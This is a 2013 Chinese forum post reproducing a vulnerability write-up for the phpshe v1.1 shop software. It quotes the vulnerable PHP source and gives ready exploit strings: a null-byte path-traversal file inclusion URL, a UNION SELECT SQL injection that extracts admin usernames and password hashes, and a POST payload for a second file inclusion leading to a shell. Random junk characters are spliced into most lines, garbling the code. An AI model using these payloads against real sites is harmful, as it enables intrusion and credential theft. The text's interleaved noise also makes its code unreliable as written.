找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2193|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/6 w( r; o2 Z% T3 l
/* Phpshe v1.1 Vulnerability0 O& x1 `: s; J! P9 k5 u8 I+ q
/* ========================3 n1 J3 q, D% N
/* By: : Kn1f3
5 x* I# C) f7 a/* E-Mail : 681796@qq.com0 w+ J1 g4 u& U, B
/*******************************************************/
" X( q+ y6 y4 y# c6 M0×00 整体大概参数传输
: L/ o# j8 Z5 w3 n: g1 j0 `/ X7 p% R - n6 T6 @! o$ U4 |; |; p; n
6 K1 v) s$ _' ]9 G+ v+ f

  B6 a" E% X: k3 {9 S//common.php% f* l1 D  O* Z0 I
if (get_magic_quotes_gpc()) {
6 P6 q8 B- `7 A7 L; N' f0 o7 a. d!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');8 q) a9 f, k7 x9 W+ d: a
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
; k! h8 |% ~8 q* ~( y}, Z8 P- Z9 {% F. b* }
else {
, }' u7 H, L# f8 W4 Z!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
5 f2 P) m+ f$ \!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');' I2 D- L, @8 Y  v
}" T5 u4 J2 @6 ]1 y" f+ `7 k
session_start();
& m, p! T3 P4 T  y' G! \!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');3 f6 [, L- j* K: C
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');) W, b/ n& Q* N+ W; X5 M- b( L2 }" Z
$ l# z. H/ ~' ?2 Y$ }6 S
0×01 包含漏洞
8 V: |; F9 ~4 c1 j4 v& X. n 0 V% b+ J2 _) {5 o5 L! z
9 j2 z. ^6 |$ v. ]& F
//首页文件( u7 E7 O* @! R+ I" @) f  k
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
9 y9 u. D+ K1 i: g6 v& Y: n8 Oinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞) C6 |7 W) G$ {; \
pe_result();
. k' Y8 O: C. L9 y$ c! b- |3 E?>
, i8 m! O# s! B  p$ I& q//common 文件 第15行开始8 J7 X% R1 _) V0 o& H: Q9 w  }
url路由配置' ~( ?0 q( m# c1 s1 p2 k& i; w, d- ^
$module = $mod = $act = 'index';( h5 k/ D: b, `
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
! _4 A  p- {! _3 x$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
$ o' g$ L! a6 r$ Q7 G& W$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);( Q: G1 b' G! u3 z! [
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
2 y- K; M8 E2 z( X


0 n! b" O9 m* Z- }7 q8 x) u. c5 b4 W 1 N1 e! S# \  K) s
0×02 搜索注入
4 r( s' I' I6 J6 Y7 Q/ k0 J+ e # U4 t" D$ H% W% Z4 K, E
<code id="code2">

//product.php文件% S0 s9 [( s! A' W& ?
case 'list':
4 l1 r+ f$ u+ G, P0 E& [* D" [$category_id = intval($id);
& V* l3 l2 @4 P, |6 _+ `$info = $db->pe_select('category', array('category_id'=>$category_id));
& O2 L9 _0 Y8 M' v. z7 U//搜索
+ _5 P% v& e$ x7 }  f! J% d$sqlwhere = " and `product_state` = 1";
4 w" v! _) B/ F& F: J; e. {) Spe_lead('hook/category.hook.php');
6 [7 }; u& k' N  S& |- `7 r+ Vif ($category_id) {& [/ b9 L4 I0 T  I+ `
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
# K9 o; p% G# u7 d}
- `' V8 f" _! U9 x$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤5 C: K* |4 L' s* d
if ($_g_orderby) {
! ~4 x* ?- t8 c6 T$orderby = explode('_', $_g_orderby);& {5 n/ t+ x6 q
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
: C; j+ H  k) e}
0 H4 ~+ M9 s5 p0 S" \& t- P) Pelse {
2 h- i7 m4 i( _6 Y: M' q& E$sqlwhere .= " order by `product_id` desc";( ]% P5 p) f* x4 P9 j) L3 B
}8 V9 C, ?& y$ ~  w  }6 m' ]% b# a
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));' n( ~6 q/ N* f+ m+ o9 W
//热卖排行
4 q6 N. F* m% |7 e% b9 N$product_hotlist = product_hotlist();
- w0 z' x6 q  x2 M9 _" y//当前路径2 D" C% Y( ]0 F9 F
$nowpath = category_path($category_id);5 o$ J: B. `& D! e9 l% l
$seo = pe_seo($info['category_name']);1 v& _" }! A! x7 I2 f% e# Y. s# [
include(pe_tpl('product_list.html'));
) T; v% m0 B5 z$ q( a' O9 J; m//跟进selectall函数库
$ V1 `8 n( o3 ]" K' y; i: Z% ~public function pe_selectall($table, $where = '', $field = '*', $limit_page = array()). h7 q( N) X$ Q9 k1 D
{
4 C, n* w/ i& H, p//处理条件语句
* ^4 }. A$ K/ h5 x" A! w$sqlwhere = $this->_dowhere($where);0 @3 y; J$ R/ L) D) e
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
6 A0 X6 j% _1 E  x  {7 g}* n4 C9 s( V$ B: B' m" f& X
//exp
- Q+ h  b. ~0 i, a9 S  g: ^product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
: z$ }& _" H, i' D5 B2 d/ ]

</code>0 z# B0 g* Y; g9 u+ @  T
3 k  ]' A3 H! f* ]
0×03 包含漏洞2* c  @' `4 v4 [/ ^. ]
) P; J1 |3 z) \3 M/ D8 _" L3 K
<code id="code3">

//order.php

case 'pay':


9 i! r/ k3 I; R3 I# t$order_id = pe_dbhold($_g_id);

% C8 o! D5 `$ @) c. W+ [
$cache_payway = cache::get('payway');

4 `- m$ W% u  D- i
foreach($cache_payway as $k => $v) {


: P- z( @) B3 n8 q5 J* Q" w  u5 m$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

+ `4 y- ?$ w9 h! Z; z$ B
if ($k == 'bank') {


8 J$ x. F1 S- g. C* p0 E: H$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

5 J+ M8 a# @2 g
}

+ t. o7 ?; B0 a8 p# C+ C1 X
}


. k6 q' k9 |! Q( n1 T" h( p6 z! T. Z$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

, l5 M9 T7 {! W
!$order['order_id'] && pe_error('订单号错误...');


. U8 a6 e, T3 h) p0 U5 Yif (isset($_p_pesubmit)) {


" ?# R' @8 u8 n! A. i( m2 qif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

) {# F% G, {5 ^* y: u
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


! l! x2 `2 b3 J4 ^foreach ($info_list as $v) {


( k- T) d3 P# i$order['order_name'] .= "{$v['product_name']};";* E4 x) U7 O  K$ J7 h


% C! X1 T$ L* O1 o}


* P' J2 [/ N& i1 t( F3 |echo '正在为您连接支付网站,请稍后...';


! `) P0 O/ t, Uinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


' r0 b. _/ Y! C* a- s}//当一切准备好的时候就可以进行"鸡肋包含了"


  B  |- A# L: m$ Y- Belse {


6 O* H- L5 H( t( I0 @1 X' ]% Cpe_error('支付错误...');

, v) ]4 f8 C# D, B6 l6 L& O" R
}

- o; S6 B$ B5 C$ i* s5 Y! H
}

( E& O) Z. N2 G
$seo = pe_seo('选择支付方式');


% i) |2 M( v, p1 _5 i7 q: ^include(pe_tpl('order_pay.html'));


! N6 [: O( x1 x( abreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
* ]$ O9 ^$ f9 c; e' Hhttp://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表